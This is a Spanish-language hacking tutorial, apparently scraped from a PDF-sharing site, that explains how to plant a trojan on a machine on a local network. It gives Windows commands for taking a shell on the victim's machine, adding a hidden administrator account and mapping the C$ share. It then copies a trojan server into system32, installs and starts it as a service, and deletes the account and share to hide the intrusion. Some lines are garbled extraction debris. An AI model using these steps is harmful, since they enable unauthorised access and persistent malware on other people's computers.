5/12/2018 Ejecutar Un Troyano en Una Red LAN - Wireless by ANTRAX - slidepdf.com
http://slidepdf.com/reader/full/ejecutar-un-troyano-en-una-red-lan-wireless-by-antrax 1/5
!"#$%&'()
*""+,!-./)
/0/111(22(
!3"(
,3"4&&//0(
56%c:\kath 192.168.0.1 192.168.0.28 Esas IP`s privadas
varian según la red lan. No siempre son las mismas.
30/c:\kath 10.10.20.1 10.10.20.255 y Como muestra la
imagen, nos da Shell en la maquina 10.10.20.6
Bueno Tecleamos NET USER, para ver quien esta como administrador, si hay invitados, etc.“acuerdate que ya estamos en la shell de 10.10.20.6”Ahora expliccare algunas pautas o comandos a tener en cuenta:
•••• C:\WINNT\system32>net user test pwd /add -------Para crearnos un usuario(invitado)
••••C:\WINNT\system32>net localgroup administradores test /add ----Para ponerlo comoAdmin
•••• C:\WINNT\system32>net localgroup administradores-----Para ver si estamos como Admin
5/12/2018 Ejecutar Un Troyano en Una Red LAN - Wireless by ANTRAX - slidepdf.com
http://slidepdf.com/reader/full/ejecutar-un-troyano-en-una-red-lan-wireless-by-antrax 2/5
Como vemos “test”(el usuario que hemos creado con password “pwd”), esta dentro de
administrador
Terminado este paso, procederemos a la infeccion de la pc, pero antes es necesario tener encuenta que si la pc de la victima se reinicia, le aparecera un cartel de aviso que estamos
conectado a su pc, pero esto solo pasa si reinicia, sino no aparecera ningun tipo de aviso.
Bueno en otra consola de DoS, ponemos estas lineas para mapearlo en nuestro explorer comounidad XC:\>nbtstat -a 10.10.20.6 Para saber el nombre de maquinaC:\>net use x: \\10.10.20.6\C$ pwd /user:VPRADO\test Para maperlo en el explorer
&/./(
5/12/2018 Ejecutar Un Troyano en Una Red LAN - Wireless by ANTRAX - slidepdf.com
http://slidepdf.com/reader/full/ejecutar-un-troyano-en-una-red-lan-wireless-by-antrax 3/5
Nos vamos a su windows/system32 y copiamos nuestro server editado. En este caso mi serverse llama loadqm.exe, nos desmapeamos de X(desconectar unidad) y regresamos a la consolade la shell de10.10.20.6, y a ejecutarlo remotamente.C:\WINNT\system32>loadqm.exe –installC:\WINNT\system32>loadqm.exeC:\WINNT\system32>net start loadqm.exeAhora para finalizar, Borramos la cuenta de usuario que creamos.
&7,
4&&
En la shell de 10.10.20.6, poniamos
5/12/2018 Ejecutar Un Troyano en Una Red LAN - Wireless by ANTRAX - slidepdf.com
http://slidepdf.com/reader/full/ejecutar-un-troyano-en-una-red-lan-wireless-by-antrax 4/5
C:\WINNT\system32>net share ----- Para ver que recursos tiene compartidosC:\WINNT\system32>net share test2=c: ----- Para comaprtir su disco C: como test2
%0,
"887/
Normalmente, se puede entrar al disco, pero dependiendo de los permisos que tenga esamaquina.
En este caso a lo que voy es que hay un pequeño truco, la carpetatemp, es casi al 100% total acceso, se copia el troyano en dicha carpeta y desde la shell secopia al System32 y se aplica lo antes mencionado para ejecutar el troyano.Seguido de esto borrar el compartidoC:\WINNT\system32>net share test2 /deletenet share test2 /deletetest2 ha sido eliminado.
Este metodo es viejo, solo le hice mejoras y esta bien explicado.
$9/:
/7&(
5/12/2018 Ejecutar Un Troyano en Una Red LAN - Wireless by ANTRAX - slidepdf.com
http://slidepdf.com/reader/full/ejecutar-un-troyano-en-una-red-lan-wireless-by-antrax 5/5
!&111(22(
%9$&/.9